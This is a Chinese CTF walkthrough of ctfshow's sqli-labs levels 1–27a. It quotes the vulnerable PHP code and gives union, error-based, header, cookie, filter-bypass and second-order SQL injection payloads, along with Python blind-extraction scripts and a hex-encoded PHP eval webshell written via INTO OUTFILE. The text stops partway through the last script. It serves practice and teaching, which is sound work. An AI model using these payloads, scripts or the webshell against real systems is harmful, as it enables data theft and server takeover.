草率地记录一下
文章目录
- 1——字符型
- 2——数字型
- 3——单引号、括号闭合
- 4——双引号、括号闭合
- 5、6——单引号与双引号的报错注入
- 7——字符型注入,导出文件`into outfile "/..../"`
- 8——GET型、单引号字符型,bool盲注
- 9、10——GET型、单引号与双引号的字符型,时间盲注
- 11——POST型、单引号的字符型注入
- 12——POST型、双引号的字符型注入
- 13、14——POST型、单引号与双引号的字符型,bool盲注
- 15——基于bool型/时间延迟单引号POST型盲注
- 16——基于bool型/时间延迟的双引号POST型盲注
- 17——基于报错的更新查询POST注入
- 18——基于HTTP头的UA、 POST报错注入
- 19——基于HTTP头的Referer POST报错注入
- 20——基于错误的Cookie头部POST注入
- 21——基于错误的复杂的字符型Cookie注入
- 22——基于报错的双引号字符型Cookie注入
- 23——基于报错的,过滤注释的GET型
- 24——基于报错的,过滤注释的GET型
- 25、25a——过滤了or和and(双写、管道符)
- 26——过滤了..很多
- 26a——bool盲注
- 27——过滤select、union
- 27a——过滤select、union
- 28、28a——过滤select、union
- 29、30、31——双服务器
- 32、33——Bypass `addslashes()`、GET型宽字节注入
- 34——Bypass `addslashes()`、POST型宽字节注入、`�`
- 35——Bypass `addslashes()`、数字型宽字节注入
- 36——`mysql_real_escape_string()`
- 37——`mysql_real_escape_string()`
- 38——`mysql_real_escape_string()`
- 39——堆叠注入
- 40——
- 41——
- 41——
- 42——
- 43——order by 注入
- 44——order by 注入
- 45——order by 注入
- 46——order by 注入
- 47——order by 注入
- 51——order by 注入
1——字符型
id=-1' union select 1,database(),(select group_concat(flag) from ctfshow.flag )-- -
2——数字型
?id=-1 union select 1,database(),(select group_concat(flagac) from ctfshow.flagaa )-- -
(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')
(select group_concat(column_name) from information_schema.columns where table_name='flagaanec')
3——单引号、括号闭合
4——双引号、括号闭合
?id=-1") union select 1,2,(select group_concat(flag23) from ctfshow.flagsf)-- -
5、6——单引号与双引号的报错注入
// Levels 5/6 (quoted from the challenge): $id is spliced straight into the SQL string
// inside single quotes and nothing in this snippet escapes it.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........';
}else{
// The raw MySQL error text is returned to the client; that is what lets the
// updatexml()/extractvalue() error-based payloads leak query results.
print_r(mysql_error()); // error message
}
1' and updatexml(1,concat(0x7e,substr((select group_concat(flag33) from ctfshow.flagpuck),15,32),0x7e),1)-- -
1" or extractvalue(1,concat(0x7e,mid((select group_concat(flag3a3) from ctfshow.flagpa) from 15 for 32),0x7e))-- -
7——字符型注入,导出文件into outfile "/..../"
// Level 7 (quoted from the challenge): the value is wrapped as (('$id')), so a payload
// has to close "'))" before it can append its own clause.
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in.... Use outfile......';
}else{
// Fixed text only: no mysql_error() output, so error-based extraction is off the
// table and the success message hints at INTO OUTFILE instead.
echo 'You have an error in your SQL syntax';
}
?id=1')) union select 0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e into outfile "/var/www/html/2.txt" -- -
....
?id=1')) union select 0x7e,(select group_concat(flag43) from ctfshow.flagdk),0x7e into outfile "/var/www/html/4.txt" -- -
也可以写一句话,但不好搞到flag…
?id=1')) union select null,0x3c3f706870206576616c28245f504f53545b315d293b3f3e,null into outfile "/var/www/html/1.php" -- -
8——GET型、单引号字符型,bool盲注
// Level 8 (quoted from the challenge): the else branch is empty, so the only
// observable signal is whether 'You are in' appears -> boolean-based blind injection.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........';
}else{
}
盲注脚本:
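import time

# ctfshow level 8 -- boolean-based blind SQLi over GET (single-quote string context).
# The page shows 'You are in...' when the WHERE clause matches and nothing otherwise,
# so an `if(cond,1,0)` ANDed into it turns every request into a one-bit oracle.
URL = 'http://92b86b48-8308-4f3d-8546-a3bba979db12.challenge.ctf.show:8080/?id='
PAYLOAD = "1' and 1=if(ascii(substr((select/**/group_concat(flag423)from(ctfshow.flagjugg)),{},1))<{},1,0)-- -"
TRUE_MARKER = 'You'          # appears only on the "row found" page
MAX_LEN = 99                 # original loop was range(1, 100): at most 99 characters
LOW, HIGH = 32, 128          # half-open search interval for each character's ASCII code
STOP_CHAR = '}'              # closing brace of the flag
REQUEST_DELAY = 0.0          # seconds between probes; the original had time.sleep(0.5) commented out

__all__ = ['bisect_char', 'extract_flag', 'main']


def bisect_char(oracle, pos, low=LOW, high=HIGH):
    """Recover the character at 1-based position *pos* by binary search.

    ``oracle(pos, mid)`` must answer True iff ``ascii(char) < mid``.  The loop keeps
    ``low <= ord(char) < high`` and stops once the interval is one wide (about
    log2(high - low) probes).  A code outside [low, high) cannot be detected: every
    probe then answers the same way and ``chr(low)`` / ``chr(high - 1)`` is returned,
    so a flag that looks odd should be re-checked by hand.
    """
    while high - low > 1:
        mid = low + (high - low) // 2
        if oracle(pos, mid):
            high = mid
        else:
            low = mid
    return chr(low)


def extract_flag(oracle, max_len=MAX_LEN, stop_char=STOP_CHAR):
    """Recover up to *max_len* characters, printing progress after each one.

    Returns the recovered string and stops as soon as *stop_char* is seen.  If the
    limit is reached without it, the flag is longer than *max_len*.
    """
    flag = ''
    for pos in range(1, max_len + 1):
        ch = bisect_char(oracle, pos)
        flag += ch
        print(flag)
        if ch == stop_char:
            break
    return flag


def main():
    """Drive the extraction against the live challenge over HTTP."""
    import requests  # local import keeps the pure search code importable without it

    session = requests.Session()  # one keep-alive connection for the ~7 probes per character

    def oracle(pos, mid):
        url = URL + PAYLOAD.format(pos, mid)
        print(url)
        # Raw concatenation as in the original; it is only safe because the payload
        # ends in '-- -' rather than '#', which a URL parser would drop as a fragment.
        page = session.get(url).text
        if REQUEST_DELAY:
            time.sleep(REQUEST_DELAY)
        return TRUE_MARKER in page

    extract_flag(oracle)


if __name__ == '__main__':
    main()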
9、10——GET型、单引号与双引号的字符型,时间盲注
// Levels 9/10 (quoted from the challenge): both branches print the same text, so the
// response body carries no information at all; the only side channel left is the
// response time, hence sleep()-based blind injection.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
echo 'You are in...........';
}else{
echo 'You are in...........';
}
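import time

# ctfshow levels 9/10 -- time-based blind SQLi over GET.  Both branches of the page
# print the same text, so the only signal is whether the server ran sleep().
URL = 'http://01faf912-1730-485f-b5b4-01f0107b62ec.challenge.ctf.show:8080/?id='
SLEEP_SECONDS = 1.0          # delay injected when the probed condition is true
TIMEOUT = 0.7                # client read timeout: must be well above normal latency and below SLEEP_SECONDS
PAUSE = 0.3                  # pacing between probes, as in the original script
PAYLOAD = "1' and if(ascii(substr((select/**/group_concat(flag4a23)from(ctfshow.flagug)),{},1))<{},sleep({}),0)-- -"
MAX_LEN = 99                 # original loop was range(1, 100): at most 99 characters
LOW, HIGH = 32, 128          # half-open search interval for each character's ASCII code
STOP_CHAR = '}'              # closing brace of the flag

__all__ = ['bisect_char', 'extract_flag', 'main']


def bisect_char(oracle, pos, low=LOW, high=HIGH):
    """Recover the character at 1-based position *pos* by binary search.

    ``oracle(pos, mid)`` must answer True iff ``ascii(char) < mid``.  The loop keeps
    ``low <= ord(char) < high`` and stops once the interval is one wide.  A code
    outside [low, high) cannot be detected and comes back as ``chr(low)`` or
    ``chr(high - 1)``; re-check by hand if the result looks odd.
    """
    while high - low > 1:
        mid = low + (high - low) // 2
        if oracle(pos, mid):
            high = mid
        else:
            low = mid
    return chr(low)


def extract_flag(oracle, max_len=MAX_LEN, stop_char=STOP_CHAR):
    """Recover up to *max_len* characters, printing progress after each one.

    Returns the recovered string and stops as soon as *stop_char* is seen.
    """
    flag = ''
    for pos in range(1, max_len + 1):
        ch = bisect_char(oracle, pos)
        flag += ch
        print(flag)
        if ch == stop_char:
            break
    return flag


def main():
    """Drive the extraction against the live challenge over HTTP."""
    import requests  # local import keeps the pure search code importable without it

    session = requests.Session()

    def oracle(pos, mid):
        url = URL + PAYLOAD.format(pos, mid, SLEEP_SECONDS)
        print(url)
        # Only a read timeout counts as "the condition was true".  The original used a
        # bare `except:`, which also turned connection errors and even Ctrl-C into a
        # "true" answer and silently corrupted the result; anything else now propagates.
        # It also used sleep(0.5) with timeout=0.5, leaving no margin for a slow but
        # non-sleeping response -- hence the separate SLEEP_SECONDS / TIMEOUT knobs.
        try:
            session.get(url, timeout=TIMEOUT)
        except requests.exceptions.Timeout:
            slept = True
        else:
            slept = False
        time.sleep(PAUSE)
        return slept

    extract_flag(oracle)


if __name__ == '__main__':
    main()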
11——POST型、单引号的字符型注入
在用户名处联合查询注入(也可以报错注入)
-1' union select 1,(select group_concat(flag43s) from ctfshow.flagugsd)#
12——POST型、双引号的字符型注入
利用报错信息知道:双引号、括号的闭合
-1") union select 1,(select group_concat(flag43as) from ctfshow.flagugsds)#
也可以报错注入
13、14——POST型、单引号与双引号的字符型,bool盲注
admin') and 1;# 发现页面返回flag.jpg
admin') and 0;# 返回slap.jpg
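import time

# ctfshow levels 13/14 -- boolean-based blind SQLi through the POST login form.
# A matching username row makes the page embed flag.jpg, a non-match slap.jpg, so
# the substring 'flag' in the response is the one-bit oracle.
URL = 'http://3ae786d0-1fe7-471e-9aee-4255845dffc9.challenge.ctf.show:8080/'
PAYLOAD = "admin') and if(ascii(substr((select/**/group_concat(flag4)from(ctfshow.flag)),{},1))<{},1,0)-- -"
TRUE_MARKER = 'flag'         # present only when the injected condition is true
TIMEOUT = 10                 # the original had none and could hang forever on a dropped connection
RETRIES = 3                  # transient network failures are retried instead of aborting the run
MAX_LEN = 99                 # original loop was range(1, 100): at most 99 characters
LOW, HIGH = 32, 128          # half-open search interval for each character's ASCII code
STOP_CHAR = '}'              # closing brace of the flag

__all__ = ['bisect_char', 'extract_flag', 'main']


def bisect_char(oracle, pos, low=LOW, high=HIGH):
    """Recover the character at 1-based position *pos* by binary search.

    ``oracle(pos, mid)`` must answer True iff ``ascii(char) < mid``.  The loop keeps
    ``low <= ord(char) < high`` and stops once the interval is one wide.  A code
    outside [low, high) cannot be detected and comes back as ``chr(low)`` or
    ``chr(high - 1)``; re-check by hand if the result looks odd.
    """
    while high - low > 1:
        mid = low + (high - low) // 2
        if oracle(pos, mid):
            high = mid
        else:
            low = mid
    return chr(low)


def extract_flag(oracle, max_len=MAX_LEN, stop_char=STOP_CHAR):
    """Recover up to *max_len* characters, printing progress after each one.

    Returns the recovered string and stops as soon as *stop_char* is seen.
    """
    flag = ''
    for pos in range(1, max_len + 1):
        ch = bisect_char(oracle, pos)
        flag += ch
        print(flag)
        if ch == stop_char:
            break
    return flag


def main():
    """Drive the extraction against the live challenge over HTTP."""
    import requests  # local import keeps the pure search code importable without it

    session = requests.Session()

    def oracle(pos, mid):
        payload = PAYLOAD.format(pos, mid)
        print(payload)
        data = {'passwd': 'a', 'uname': payload}
        for attempt in range(1, RETRIES + 1):
            try:
                return TRUE_MARKER in session.post(URL, data=data, timeout=TIMEOUT).text
            except (requests.exceptions.Timeout, requests.exceptions.ConnectionError):
                if attempt == RETRIES:
                    raise
                time.sleep(1)  # back off briefly before retrying the same probe

    extract_flag(oracle)


if __name__ == '__main__':
    main()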
15——基于bool型/时间延迟单引号POST型盲注
admin' and sleep(5)-- -
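import time

# ctfshow level 15 -- time-based blind SQLi through the POST login form
# (single-quote context).  The page gives no content difference, so the only
# signal is whether the server ran sleep().
URL = 'http://d677bfbf-5339-4f53-9301-e717d4e3381a.challenge.ctf.show:8080/'
SLEEP_SECONDS = 1.0          # delay injected when the probed condition is true
TIMEOUT = 0.7                # client read timeout: well above normal latency, below SLEEP_SECONDS
PAYLOAD = "admin' and if(ascii(substr((select/**/group_concat(flag4sa)from(ctfshow.flagba)),{},1))<{},sleep({}),0)-- -"
REQUEST_DELAY = 0.0          # seconds between probes; the original had time.sleep(0.3) commented out
MAX_LEN = 99                 # original loop was range(1, 100): at most 99 characters
LOW, HIGH = 32, 128          # half-open search interval for each character's ASCII code
STOP_CHAR = '}'              # closing brace of the flag

__all__ = ['bisect_char', 'extract_flag', 'main']


def bisect_char(oracle, pos, low=LOW, high=HIGH):
    """Recover the character at 1-based position *pos* by binary search.

    ``oracle(pos, mid)`` must answer True iff ``ascii(char) < mid``.  The loop keeps
    ``low <= ord(char) < high`` and stops once the interval is one wide.  A code
    outside [low, high) cannot be detected and comes back as ``chr(low)`` or
    ``chr(high - 1)``; re-check by hand if the result looks odd.
    """
    while high - low > 1:
        mid = low + (high - low) // 2
        if oracle(pos, mid):
            high = mid
        else:
            low = mid
    return chr(low)


def extract_flag(oracle, max_len=MAX_LEN, stop_char=STOP_CHAR):
    """Recover up to *max_len* characters, printing progress after each one.

    Returns the recovered string and stops as soon as *stop_char* is seen.
    """
    flag = ''
    for pos in range(1, max_len + 1):
        ch = bisect_char(oracle, pos)
        flag += ch
        print(flag)
        if ch == stop_char:
            break
    return flag


def main():
    """Drive the extraction against the live challenge over HTTP."""
    import requests  # local import keeps the pure search code importable without it

    session = requests.Session()

    def oracle(pos, mid):
        payload = PAYLOAD.format(pos, mid, SLEEP_SECONDS)
        print(payload)
        data = {'passwd': 'a', 'uname': payload}
        # Only a read timeout counts as "true".  The original bare `except:` also
        # classified connection errors and Ctrl-C as "true"; those now propagate.
        try:
            session.post(URL, data=data, timeout=TIMEOUT)
        except requests.exceptions.Timeout:
            slept = True
        else:
            slept = False
        if REQUEST_DELAY:
            time.sleep(REQUEST_DELAY)
        return slept

    extract_flag(oracle)


if __name__ == '__main__':
    main()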
16——基于bool型/时间延迟的双引号POST型盲注
admin") and sleep(5)-- -
17——基于报错的更新查询POST注入
$uname=check_input($_POST['uname']); //check_input函数对unam进行过滤
$passwd=$_POST['passwd']; //但没有过滤passwd
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
check_input() 只处理了 uname,passwd 没有经过任何过滤就被拼进了 UPDATE 语句,所以注入点在密码字段;payload 末尾的 `or '` 用来闭合原语句里剩下的那个单引号
passwd=DMIND' and updatexml(1,concat(0x7e,database(),0x7e),1) or '&submit=Submit&uname=admin
可以报错注入:
1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),0x7e))#
1' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="flag"),0x7e))#
1' or extractvalue(1,concat(0x7e,mid((select group_concat(flag4) from ctfshow.flag),15,32),0x7e))#
18——基于HTTP头的UA、 POST报错注入
注入点在HTTP头的User-Agent处
// Level 18 (quoted from the challenge): the User-Agent header and the client IP are
// read up front and never passed through check_input().
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
// Both POST fields are sanitised, so the login query itself is not the target.
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
// Reached only when the credentials are valid: $uagent (and $IP) are interpolated
// into the INSERT unescaped, so the header is the injection point -- but an
// attacker must already hold a working username/password to get here.
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);}
}
对 passwd 和 uname 都做了过滤,但 `$uagent` 直接取自 User-Agent 头,没有任何处理就拼进了 INSERT 语句,因此可以利用。
注意这条 INSERT 只在 `$row1` 非空(即用户名和密码验证通过)时才执行,所以要先拿到一组有效凭据,再改 UA 头发包
因为UA处有回显,利用extractvalue()报错注入
1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
放进sql语句中:
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '', '$IP', $uname)";
1' and extractvalue(1,concat(0x7e,mid((select group_concat(flag4) from ctfshow.flag),20,30),0x7e)) and '
19——基于HTTP头的Referer POST报错注入
注入点换成了Referer
,操作和上面的一样
20——基于错误的Cookie头部POST注入
注入点换成了Cookie
,操作和上面的一样
21——基于错误的复杂的字符型Cookie注入
base64编码,单引号,报错型,cookie型注入。
多了一个base64_decode的过程,所以我们只要把之前的payload进行base64编码即可
编码前:
admin') and extractvalue(1,concat(0x7e,mid((select group_concat(flag4) from ctfshow.flag),20,30),0x7e))#
22——基于报错的双引号字符型Cookie注入
base64编码,双引号,报错型,cookie型注入。
编码前:
admin" and extractvalue(1,concat(0x7e,mid((select group_concat(flag4) from ctfshow.flag),1,30),0x7e))#
23——基于报错的,过滤注释的GET型
// Level 23 (quoted from the challenge): only the comment tokens are stripped, in a
// single pass each; the quote itself is never escaped.
if(isset($_GET['id']))
{
$id=$_GET['id'];
//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
// A payload can still break out of id='...'; instead of commenting out the trailing
// quote it has to re-close it, e.g. with "or '1'='1".
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
}
过滤了注释符:#
和--
,利用and '1'='1
闭合SQL语句最后的单引号,继续报错注入
?id=1' or extractvalue(1,concat(0x7e,database(),0x7e)) or '1'='1
......
?id=1' or extractvalue(1,concat(0x7e,mid((select group_concat(flag4) from ctfshow.flag),1,30),0x7e)) or '1'='1
24——基于报错的,过滤注释的GET型
问题出在 pass_change.php(修改密码)这个文件中:变量 `$username` 没有经过 mysql_real_escape_string() 过滤就直接拼进了 UPDATE 语句。`$username` 就是我们登录的用户名,登录成功后它保存在 `$_SESSION["username"]` 里。这是典型的二次注入:注册时用户名被安全地存进数据库,改密码时又被原样取出来拼 SQL。
另外注意下面 payload 末尾的 `or '1'='1` 会让 UPDATE 的 WHERE 条件对所有行都成立,很可能把库里每个用户的密码都改成提交的新密码,脚本每探测一次就改一次。
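import time

# ctfshow level 24 -- second-order, time-based blind SQLi.  The username is stored
# safely at registration, but pass_change.php later splices $_SESSION["username"]
# into an UPDATE unescaped, so each probe is a three-step dance:
# register(payload as username) -> login -> change password (the timed request).
BASE_URL = 'http://ca8a2eff-9507-41f3-ba9a-8315233eafd8.challenge.ctf.show:8080/'
PASSWORD = 'a'               # throw-away password used for every probe account
SLEEP_SECONDS = 1.0          # delay injected when the probed condition is true
TIMEOUT = 0.7                # read timeout for the timed step: above normal latency, below SLEEP_SECONDS
SETUP_TIMEOUT = 10           # the register/login steps had no timeout at all in the original
PAYLOAD = "DMIND' or if(ascii(substr((select/**/group_concat(flag4)from(ctfshow.flag)),{},1))<{},sleep({}),0) or '1'='1"
MAX_LEN = 99                 # original loop was range(1, 100): at most 99 characters
LOW, HIGH = 32, 128          # half-open search interval for each character's ASCII code
STOP_CHAR = '}'              # closing brace of the flag

__all__ = ['bisect_char', 'extract_flag', 'main']


def bisect_char(oracle, pos, low=LOW, high=HIGH):
    """Recover the character at 1-based position *pos* by binary search.

    ``oracle(pos, mid)`` must answer True iff ``ascii(char) < mid``.  The loop keeps
    ``low <= ord(char) < high`` and stops once the interval is one wide.  A code
    outside [low, high) cannot be detected and comes back as ``chr(low)`` or
    ``chr(high - 1)``; re-check by hand if the result looks odd.
    """
    while high - low > 1:
        mid = low + (high - low) // 2
        if oracle(pos, mid):
            high = mid
        else:
            low = mid
    return chr(low)


def extract_flag(oracle, max_len=MAX_LEN, stop_char=STOP_CHAR):
    """Recover up to *max_len* characters, printing progress after each one.

    Returns the recovered string and stops as soon as *stop_char* is seen.
    """
    flag = ''
    for pos in range(1, max_len + 1):
        ch = bisect_char(oracle, pos)
        flag += ch
        print(flag)
        if ch == stop_char:
            break
    return flag


def main():
    """Drive the extraction against the live challenge over HTTP.

    Side effects worth knowing before running this: every probe creates a new user
    whose name is the payload (a re-run with the same (pos, mid) pairs will hit
    duplicate names), and because the payload ends in ``or '1'='1`` the UPDATE's
    WHERE clause most likely matches every row, resetting all users' passwords to
    PASSWORD on each probe.
    """
    import requests  # local import keeps the pure search code importable without it

    session = requests.Session()  # one session so the login cookie carries over to pass_change.php

    def oracle(pos, mid):
        username = PAYLOAD.format(pos, mid, SLEEP_SECONDS)
        print(username)
        # 1) register an account whose *name* is the payload (stored escaped, harmless here)
        session.post(BASE_URL + 'login_create.php', timeout=SETUP_TIMEOUT, data={
            'username': username,
            'password': PASSWORD,
            're_password': PASSWORD,
            'submit': 'Register',
        })
        # 2) log in so $_SESSION["username"] now holds the payload
        session.post(BASE_URL + 'login.php', timeout=SETUP_TIMEOUT, data={
            'login_user': username,
            'login_password': PASSWORD,
            'mysubmit': 'Login',
        })
        # 3) change the password: the UPDATE splices the session username unescaped,
        #    so our if()/sleep() runs here.  Only a read timeout counts as "true"; the
        #    original bare `except:` also swallowed connection errors and Ctrl-C, and
        #    paired sleep(0.1) with timeout=0.1, which misfires on any latency jitter.
        try:
            session.post(BASE_URL + 'pass_change.php', timeout=TIMEOUT, data={
                'current_password': PASSWORD,
                'password': PASSWORD,
                're_password': PASSWORD,
                'submit': 'Reset ',
            })
        except requests.exceptions.Timeout:
            return True
        return False

    extract_flag(oracle)


if __name__ == '__main__':
    main()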
25、25a——过滤了or和and(双写、管道符)
// Level 25/25a blacklist (quoted from the challenge).  Each preg_replace makes one
// non-recursive pass, so a doubled keyword survives it: "oorr" -> "or",
// "anandd" -> "and".  The symbolic forms "||" and "&&" are not matched at all.
// Note that "information_schema" contains "or" and is mangled too unless it is
// written as "infoorrmation_schema".
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
return $id;
}
测试一下:
?id=1' or sleep(5)-- - 无延时
?id=1' || sleep(5)-- - 有延时(less-25)
?id=1 || sleep(5)-- - 有延时(less-26)
过滤了or和and,但可以双写绕过:preg_replace 只替换一遍、不会递归,`oorr` 中间的 `or` 被删掉后剩下的仍是 `or`。注意 `information_schema` 本身就含有 `or`,同样会被改坏,所以下面写成了 `infoorrmation_schema`
?id=-1' union select 1,2,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow')-- -
?id=-1' union select 1,2,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags')-- -
?id=-1' union select 1,2,(select group_concat(flag4s) from ctfshow.flags)-- -
26——过滤了…很多
// Level 26 blacklist (quoted from the challenge).  What each pattern actually removes:
//   /[\/\*]/    every '/' and every '*' individually (so "/**/" is gone)
//   /[--]/      a character class containing '-': every single '-'
//   /[#]/       every '#'
//   /[\s]/      every whitespace character (space, tab, newline, ...)
//   /[\/\\\\]/  every '/' and '\'
// Nothing touches '|', '&', '(', ')' or quotes, which is why "||", "&&" and
// parenthesised sub-queries are the way around it.  Each pass is single and
// non-recursive, so doubled keywords ("oorr") still survive.
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
过滤了:or、and、/*、--、#、空格、斜杠
空格通常有这些绕过,
%20 空格
%09 TAB 键(水平)
%0b TAB 键(垂直)
%0d return 功能
%0c 新的一页
%a0 空格
%0a 新建一行
但这些在这里都不起作用(上面 `/[\s]/` 那条规则会删掉常见的空白字符),可以用管道符 `||`,配合 if、extractvalue 等函数,这种写法几乎用不到空格。可以先测试一下延时注入,注意末尾的 `'0`
是为了闭合语句的单引号,且不能写成 `'1`:`||'1'` 恒为真,整个条件的真假就不再取决于中间的 if 了
a'||if(1=1,sleep(5),0)||'0
但既然都能用1 or sleep(1) or '0
的句式了,中间换成报错语句也可以尝试一下:1 or extractvalue(1,1) or '0
?id=a'||extractvalue(1,concat(0x7e,user(),0x7e))||'0
用报错注入:用括号绕过空格
?id=a'||extractvalue(1,concat(0x7e,substr((select(flag4s)from(ctfshow.flags)),15,32),0x7e))||'0
26a——bool盲注
这题用报错注入不成功,…然后想着用延时的,但发现脚本跑出来的内容有偏差(我脚本的问题?),然后就懵了…
看Y4大佬的才知道用到了bool盲注而不是时间盲注,淦大意了,忘记了这个
?id=a')||if(1=0,1,0)||('0 不能回显id为1的信息
?id=a')||if(1=1,1,0)||('0 能回显id为1的信息
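import time

# ctfshow level 26a -- boolean-based blind SQLi over GET with or/and, comments and
# whitespace stripped.  The WHERE becomes id=(('a')||if(cond,1,0)||('0')): when cond
# holds it evaluates to id=1 and the page shows that row's username 'Dumb';
# otherwise no row is returned.  Error-based extraction did not work on this level.
URL = 'http://d81d5378-380f-4514-b4fc-58bf1af836ba.challenge.ctf.show:8080/'
PAYLOAD = "a')||if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{},1))<{},1,0)||('0"
TRUE_MARKER = 'Dumb'         # username of the id=1 row, shown only when the condition is true
TIMEOUT = 5                  # the original used 1s and crashed on the first slow response
RETRIES = 3                  # transient network failures are retried instead of aborting the run
MAX_LEN = 99                 # original loop was range(1, 100): at most 99 characters
LOW, HIGH = 32, 128          # half-open search interval for each character's ASCII code
STOP_CHAR = '}'              # closing brace of the flag

__all__ = ['bisect_char', 'extract_flag', 'main']


def bisect_char(oracle, pos, low=LOW, high=HIGH):
    """Recover the character at 1-based position *pos* by binary search.

    ``oracle(pos, mid)`` must answer True iff ``ascii(char) < mid``.  The loop keeps
    ``low <= ord(char) < high`` and stops once the interval is one wide.  A code
    outside [low, high) cannot be detected and comes back as ``chr(low)`` or
    ``chr(high - 1)``; re-check by hand if the result looks odd.
    """
    while high - low > 1:
        mid = low + (high - low) // 2
        if oracle(pos, mid):
            high = mid
        else:
            low = mid
    return chr(low)


def extract_flag(oracle, max_len=MAX_LEN, stop_char=STOP_CHAR):
    """Recover up to *max_len* characters, printing progress after each one.

    Returns the recovered string and stops as soon as *stop_char* is seen.
    """
    flag = ''
    for pos in range(1, max_len + 1):
        ch = bisect_char(oracle, pos)
        flag += ch
        print(flag)
        if ch == stop_char:
            break
    return flag


def main():
    """Drive the extraction against the live challenge over HTTP."""
    import requests  # local import keeps the pure search code importable without it

    session = requests.Session()

    def oracle(pos, mid):
        payload = PAYLOAD.format(pos, mid)
        print(payload)
        # params= lets requests percent-encode the quotes and parentheses for us.
        for attempt in range(1, RETRIES + 1):
            try:
                return TRUE_MARKER in session.get(URL, params={'id': payload}, timeout=TIMEOUT).text
            except (requests.exceptions.Timeout, requests.exceptions.ConnectionError):
                if attempt == RETRIES:
                    raise
                time.sleep(1)  # back off briefly before retrying the same probe

    extract_flag(oracle)


if __name__ == '__main__':
    main()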
27——过滤select、union
// Level 27 blacklist (quoted from the challenge).  None of the keyword patterns use
// the /i flag, so only the exact spellings select/SELECT/Select and
// union/UNION/Union are removed; any other mix of case ("sEleCt", "uNIoN") passes.
// The /m and /s flags change nothing for a plain literal.  "[ +]" removes only a
// literal space and '+'; other whitespace is untouched.  All passes are single and
// non-recursive.
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out lowercase select (the comment said "spaces").
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out Select
return $id;
}
上面的正则没有用 /i 修饰符,只精确匹配 select/SELECT/Select 和 union/UNION/Union 这几种写法,其它大小写混合(如 `sEleCt`、`uNIoN`)都不会被过滤,可以这样绕过
?id=a'||extractvalue(1,concat(0x7e,substr((sEleCt(flag4s)from(ctfshow.flags)),1,32),0x7e))||'0
27a——过滤select、union
换成了双引号,用报错又不成功…
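import time

# ctfshow level 27a -- boolean-based blind SQLi over GET, double-quote context, with
# select/union filtered case-sensitively (so "sEleCt" passes).  The WHERE becomes
# id="a"||if(cond,1,0)||"0": when cond holds it evaluates to id=1 and the page shows
# that row's username 'Dumb'.  Error-based extraction did not work on this level.
URL = 'http://31ba5ceb-d1f0-4f2d-99a4-a375cb274496.challenge.ctf.show:8080/'
PAYLOAD = 'a"||if(ascii(substr((sEleCt(group_concat(flag4s))from(ctfshow.flags)),{},1))<{},1,0)||"0'
TRUE_MARKER = 'Dumb'         # username of the id=1 row, shown only when the condition is true
TIMEOUT = 5                  # the original used 1s and crashed on the first slow response
RETRIES = 3                  # transient network failures are retried instead of aborting the run
MAX_LEN = 99                 # original loop was range(1, 100): at most 99 characters
LOW, HIGH = 32, 128          # half-open search interval for each character's ASCII code
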